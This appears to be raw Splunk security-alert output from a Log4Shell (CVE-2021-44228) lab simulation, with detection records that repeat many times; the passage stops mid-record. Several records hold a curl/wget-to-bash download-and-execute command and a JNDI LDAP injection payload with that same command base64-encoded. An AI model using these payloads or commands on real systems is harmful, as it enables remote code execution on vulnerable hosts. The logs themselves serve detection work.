info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643054, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="Stage:Initial Access", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643054, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="CVE-2021-44228", annotations._all="CIS 13", annotations._all="T1190", annotations._all="PR.DS", annotations._all="DE.CM", annotations._all="Actions on Objectives", annotations._all="Stage:Initial Access", annotations._all="DE.AE", annotations._all="PR.PT", annotations._all="T1059", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Command and Control", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 16", annotations._all="CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 5", annotations._all="Source:Application Log", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643016, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell 